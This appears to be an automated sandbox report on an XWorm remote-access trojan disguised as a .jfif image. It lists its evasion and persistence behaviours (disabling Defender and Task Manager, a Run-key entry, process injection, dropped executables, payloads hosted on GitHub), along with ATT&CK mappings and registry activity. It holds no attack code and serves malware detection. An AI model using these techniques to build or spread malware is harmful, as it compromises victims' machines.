Malware Analysis Report

2024-09-11 13:54

Sample ID 240615-h1dz6avhpp
Target download (2).jfif
SHA256 54d8f92fe68af989165b1a99c28559e0a83664e29f6c92791626272682727306
Tags
xworm evasion persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54d8f92fe68af989165b1a99c28559e0a83664e29f6c92791626272682727306

Threat Level: Known bad

The file download (2).jfif was found to be: Known bad.

Malicious Activity Summary

xworm evasion persistence rat trojan

Detect Xworm Payload

Contains code to disable Windows Defender

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

Blocklisted process makes network request

Downloads MZ/PE file

Disables Task Manager via registry modification

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Checks SCSI registry key(s)

Checks processor information in registry

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-15 07:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 07:11

Reported

2024-06-15 07:14

Platform

win10-20240404-en

Max time kernel

150s

Max time network

151s

Command Line

winlogon.exe

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3820 created 588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\svchost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\x4s.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\x4s.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4s = "C:\\Users\\Admin\\AppData\\Roaming\\x4s.exe" C:\Users\Admin\AppData\Local\Temp\x4s.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4PlaybackManager.evtx c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4Operational.evtx c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4CaptureMonitor.evtx c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3820 set thread context of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\svchost32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svchost32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\x4s.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
